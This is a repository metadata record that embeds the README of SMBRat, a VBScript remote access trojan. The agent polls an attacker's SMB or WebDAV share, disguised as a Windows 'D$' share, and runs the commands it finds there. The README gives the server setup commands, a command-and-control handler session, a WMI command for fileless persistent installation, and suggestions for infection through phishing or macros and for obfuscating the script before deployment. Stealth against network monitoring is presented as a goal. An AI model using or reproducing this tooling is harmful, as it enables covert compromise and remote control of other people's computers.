{"id":13389859,"url":"https://github.com/operatorequals/SMBRat","last_synced_at":"2025-03-13T14:32:07.139Z","repository":{"id":75562761,"uuid":"126842633","full_name":"operatorequals/SMBRat","owner":"operatorequals","description":"A Windows Remote Administration Tool in Visual Basic with UNC paths","archived":false,"fork":false,"pushed_at":"2019-04-19T07:43:56.000Z","size":64,"stargazers_count":23,"open_issues_count":0,"forks_count":13,"subscribers_count":5,"default_branch":"master","last_synced_at":"2024-10-26T11:33:30.336Z","etag":null,"topics":["persistence","remote-admin-tool","shell","smb","vbs","visual-basic","windows","wmi"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/operatorequals.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2018-03-26T14:36:59.000Z","updated_at":"2023-09-28T10:49:18.000Z","dependencies_parsed_at":"2023-06-06T22:15:11.110Z","dependency_job_id":null,"html_url":"https://github.com/operatorequals/SMBRat","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/operatorequals%2FSMBRat","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/operatorequals%2FSMBRat/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/operatorequals%2FSMBRat/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/operatorequals%2FSMBRat/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/operatorequals","download_url":"https://codeload.github.com/operatorequals/SMBRat/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243422633,"owners_count":20288494,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["persistence","remote-admin-tool","shell","smb","vbs","visual-basic","windows","wmi"],"created_at":"2024-07-30T13:01:36.304Z","updated_at":"2025-03-13T14:32:06.083Z","avatar_url":"https://github.com/operatorequals.png","language":"Python","funding_links":[],"categories":["Python","Python (1887)"],"sub_categories":[],"readme":"# SMBRat\nA Windows Remote Administration Tool in *Visual Basic Script*\n\n\n## Idea\n*Windows Environments* like *Active Directory* Networks, get really bloated with *SMB* traffic.\n\nAll hosts get *Policies* from the *SYSVOL*, configurations need remote files to work, desktop shortcuts tend to point to ``\\\\something\\else\\in\\the\\network.exe``.\n\nNone would notice one more connection attempt. *Right?*\n\n \\- Especially if it succeeds (it is a fashion to only monitor *Firewall* ***Denies***)\n\n\n## Ingredients\n\n\n### Agent\n\n#### Documentation/Archiving Friendly\nThe `agent` is a *Visual Basic Script* that runs on the infected host and connects to the *SMB Server*. It creates a directory in there named after the host's `hostname` and primary `MAC` address (trying to be *unique* and *informative* at the same time for reporting purposes). All commands and info for the infected Host will be stored in this directory. `zip`ping the whole Shared Folder will archive all project info!\n\n#### Stealthy\nIt does **NOT** use a drive letter to *Mount* the Share, just uses `UNC paths` to directly read remote files (no *Drive* is created in `explorer.exe`).\n\nIt also injects the `UNC path` into the `%PATH%` variable of its own execution environment (you can run executables directly from your Linux machine's filesystem).\n\n#### Agent's Execution\n\nThe `agent` is configured to **run once**. **Statelessly**.\n\nIt's Routine is (more-or-less) as follows:\n* It looks for a file named `exec.dat` in the folder it created in the *SMB Share*\n* If it finds the file, it **reads its content** and executes it as a command with `cmd.exe /c \u003ccommand\u003e` like a *semi-interactive shell*.\n* The command's response is stored in `output.dat` (next to `exec.dat`). \n* Deletes the `exec.dat` file.\n\n##### [Wiki Page for Setting the *Agent*](https://github.com/operatorequals/SMBRat/wiki/Agent)\n\n\n\n### Handler\n\nThe `handler` needs an *SMB Server* to work. The `smbserver.py` module from [*Core Security's* `impacket`](https://github.com/coresecurity/impacket) package will do.\n\nMost probably `smbd` would also do the trick, but hasn't been tested yet.\n\n#### Setting up the *SMB Server*\n\nA share with name `D$` is needed, to look like a legit Windows host's SMB.\n\n```bash\n# mkdir Share\n# smbserver.py -comment \"My Share\" \"D$\" Share/\nImpacket v0.9.17-dev - Copyright 2002-2018 Core Security Technologies\n\n[*] Config file parsed\n[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0\n[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0\n[*] Config file parsed\n[*] Config file parsed\n[*] Config file parsed\n\n```\n#### The *WebDAV* case!\nAs the `agent` is configured to only use UNC paths, WebDAV can also be used with **zero-changes**.\nInstead of an SMB server, a *WebDAV server* can be used (a great WebDAV server with SSL support is [wsgidav](https://github.com/mar10/wsgidav/)).\n\n```bash\n# mkdir 'D$'\n# wsgidav -p 80 -H 0.0.0.0 -r . --auth anonymous\n[...] INFO    :  WsgiDAV/3.0.0 Python/2.7.16 Linux-4.19.0-kali3-amd64-x86_64-with-Kali-kali-rolling-kali-rolling\n[...] INFO    :  Lock manager:      LockManager(LockStorageDict)\n[...] INFO    :  Property manager:  None\n[...] INFO    :  Domain controller: SimpleDomainController()\n[...] INFO    :  Registered DAV providers by route:\n[...] INFO    :    - '/:dir_browser': FilesystemProvider for path '/root/.virtualenvs/wsgidav/local/lib/python2.7/site-packages/wsgidav/dir_browser/htdocs' (Read-Only) (anonymous)\n[...] INFO    :    - '/': FilesystemProvider for path '/tmp/DAV' (Read-Write) (anonymous)\n[...] WARNING :  Basic authentication is enabled: It is highly recommended to enable SSL.\n[...] WARNING :  Share '/:dir_browser' will allow anonymous read access.\n[...] WARNING :  Share '/' will allow anonymous write access.\n[...] INFO    :  Running WsgiDAV/3.0.0 Cheroot/6.5.4 Python/2.7.16\n[...] INFO    :  Serving on http://0.0.0.0:80 ...\n\n[...] INFO    :  192.168.163.130 - (anonymous) - [2019-04-18 14:57:53] \"PROPFIND /D$/Project1/DESKTOP-I3NFOQ5-John-AA-BB-CC-DD-EE-FF/ping.dat\" length=0, depth=0, elap=0.004sec -\u003e 207 Multi-Status\n```\nFor the SSL support, the UNC paths have to change slightly, from:\n```\n\\\\\u003cServer-IP\u003e\\DIR\\\n```\nto:\n```\n\\\\\u003cServer-IP\u003e@SSL@443\\DIR\\\n```\nThis change can only be done to `ServerName` `agent.vbs` variable, as all paths are constructed by this.\nKeep in mind that the SSL certificates have to be **trusted by the system running the `agent`**. Self-signed Certificates **will fail** with warnings.\n\n\n## Infection Scheme\n\n### Infect a Host from a file\nA *While loop* can be added to the `agent.vbs` file's beginning, with a delay statement of multiple seconds (10 secs is ideal), and it will be able to infect windows hosts by *double clicking* / *phishing* / *excel macros* / etc...\n\nA `while True` loop in *VBS* with delay of 1 second looks like this:\n```vb\nDo While True\n\t[...]\n\tWScript.Sleep 1000\nLoop\n```\n\n### Infect a Host *fileless*\nYet, if a Windows host has *RPC* enabled, it is possible to install the *VBS* file as *fileless malware* through `WMI` and the fabulous `impacket` package examples with a command like:\n```bash\n$ examples/wmipersist.py '\u003cusername\u003e:\u003cpassword\u003e@\u003chostname/ipaddress\u003e' install -vbs agent.vbs -name smbrat -timer 10\n```\n\nIt is also possible to utilize the `WMI` tool by local access to install the `agent.vbs` as fileless malware.\n\n### Obfuscation?\nVisual Basic Scripts can be nicely *obfuscated*, *base64*'d as well as *minified*.\n\nIt can be really handy to give it a spin before \"deploying\" :wink:\n* [Online Tool for VBS Obfuscation](https://isvbscriptdead.com/vbs-obfuscator/)\n* [Github Repo](https://github.com/DoctorLai/VBScript_Obfuscator)\n\n## [Directory Structure in the *SMB Share*](https://github.com/operatorequals/SMBRat/wiki/Directory-Structure)\n\n\n#### Never create folders manually in the Shared Folder\n\n\n\n## Barebone Usage\n\n~~At time of writing, no `Handler` shell is implemented,~~ so usage can be done by just using a command like `watch` to inspect the `output.dat` file:\n\n```bash\n$ watch -n0.2 cat Share/projectName/DESKTOP-XXXXXXX-AA\\:BB\\:CC\\:DD\\:EE\\:FF/output.dat\n```\nand `echo` to write stuff to the `exec.dat` file:\n```bash\n$ echo 'whoami /all' \u003e Share/projectName/DESKTOP-XXXXXXX-AA\\:BB\\:CC\\:DD\\:EE\\:FF/exec.dat\n```\n\n## The `handler.py`\n\nThe experimental shell works as follows: \n```bash\n$ python handler.py Share/\nSMBRat\u003e \n# When a new host gets infected:\n[+] Agent \"DESKTOP-EG4OE7J\" (00:0C:29:2B:9F:AF) just checked-in for Project: \"projectName\"\n\nSMBRat\u003e execall whoami /user\n\n[\u003e] Sending 'whoami /user' to \"projectName/DESKTOP-EG4OE7J-00:0C:29:2B:9F:AF\" ...\n\t\t\nSMBRat\u003e \n[\u003c] Response from 'projectName/DESKTOP-EG4OE7J-00:0C:29:2B:9F:AF': \n\n\nUSER INFORMATION\n----------------\n\nUser Name           SID     \n=================== ========\nnt authority\\system S-1-5-18\n\n^^^^^^^^^^^^^^^^^^^^ projectName/DESKTOP-EG4OE7J-00:0C:29:2B:9F:AF ^^^^^^^^^^^^^^^^^^^^\nSMBRat\u003e \n\t\t\t\t\n```\n\n## Outstanding Pitfalls\n\n### SMBv1 is **Not Encrypted** :\n\n```bash\n# tcpdump -i eth0 -A\ntcpdump: verbose output suppressed, use -v or -vv for full protocol decode\nlistening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes\n\n[...]\n\n15:25:06.695502 IP Deskjet-4540.microsoft-ds \u003e 172.16.47.129.3128: Flags [P.], seq 2876:2971, ack 4791, win 2110, length 95 SMB PACKET: SMBreadX (REPLY)\n\nE...,E@.@.V.../.../....8\n.\u0026Mi~.6P..\u003e.......[.SMB........................\n.@............ .;........... .net localgroup \"administrators\"\n\n[...]\n\n15:25:06.702916 IP 172.16.47.129.3128 \u003e Deskjet-4540.microsoft-ds: Flags [P.], seq 4917:5111, ack 3097, win 2052, length 194 SMB PACKET: SMBtrans2 (REQUEST)\n\nE...E.@......./.../..8..i~..\n.'*P....b.......SMB2......................\n\n.F..z.....(...........z.D.........}..........\\.p.r.o.j.e.c.t.N.a.m.e.\\.D.E.S.K.T.O.P.-.E.G.4.O.E.7.J.-.0.0.:.0.C.:.2.9.:.2.B.:.9.F.:.A.F.\\.o.u.t.p.u.t...d.a.t...\n\n[...]\n\n15:25:06.751372 IP 172.16.47.129.3128 \u003e Deskjet-4540.microsoft-ds: Flags [P.], seq 6049:6393, ack 3748, win 2050, length 344 SMB PACKET: SMBwrite (REQUEST)\n\nE...E.@....L../.../..8..i~. \n.).P....*.....T.SMB........................\n.T....$.......'..$.Alias name     administrators\nComment        Administrators have complete and unrestricted access to the computer/domain\n\nMembers\n\n-------------------------------------------------------------------------------\nAdmin\nAdministrator\ndefaultuser0\nThe command completed successfully.\n\n[...]\n\n```\n\nThe traffic (file *contents* and *paths*) are tranfered in plaintext if *SMBv1 Server* is used (e.g `impacket` 's `smbserver.py`).\n\n* An encryption/obfuscation layer would totally solve this one!\n\n### The whole Share is *READ/WRITE* to Everyone:\n\nAll Agents can modify files stored in the **Whole Share**. Meaning they can modify the `exec.dat` of other Agents...\nAn `smbmap` will shed light:\n```bash\n$ smbmap -H 172.16.47.189\n[+] Finding open SMB ports....\n[+] User SMB session establishd on 172.16.47.189...\n[+] IP: 172.16.47.189:445\tName: Deskjet-4540                                      \n\tDisk                                                  \tPermissions\n\t----                                                  \t-----------\n\tD$                                                \tREAD, WRITE\n\t[!] Unable to remove test directory at \\\\172.16.47.189\\D$\\SVNRmxBFAO, plreae remove manually\n\tIPC$                                              \tREAD, WRITE\n\t[!] Unable to remove test directory at \\\\172.16.47.189\\IPC$\\SVNRmxBFAO, plreae remove manually\n```\n#### Pay attention to the lack of `-u` and `-p` parameters of `smbmap`.\nThis is a *NULL session* (like FTP anonymous login). **EVERYONE can change the SHARE Files** and get *Remote Code Execution* on all infected machines.\n\n* Better fire up some `iptables` here...\n\n### The sessions are NOT **Interactive**\n\nType `execall netsh` and you lost all your Agents. None will respond as the `agent.vbs` will spawn the `netsh.exe` shell and will wait for it to terminate, so it can write its contents to `output.dat`. But Guess What... It **won't** terminate... It's gonna hang with the `netsh\u003e` pointing to the void.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Foperatorequals%2FSMBRat","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Foperatorequals%2FSMBRat","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Foperatorequals%2FSMBRat/lists"}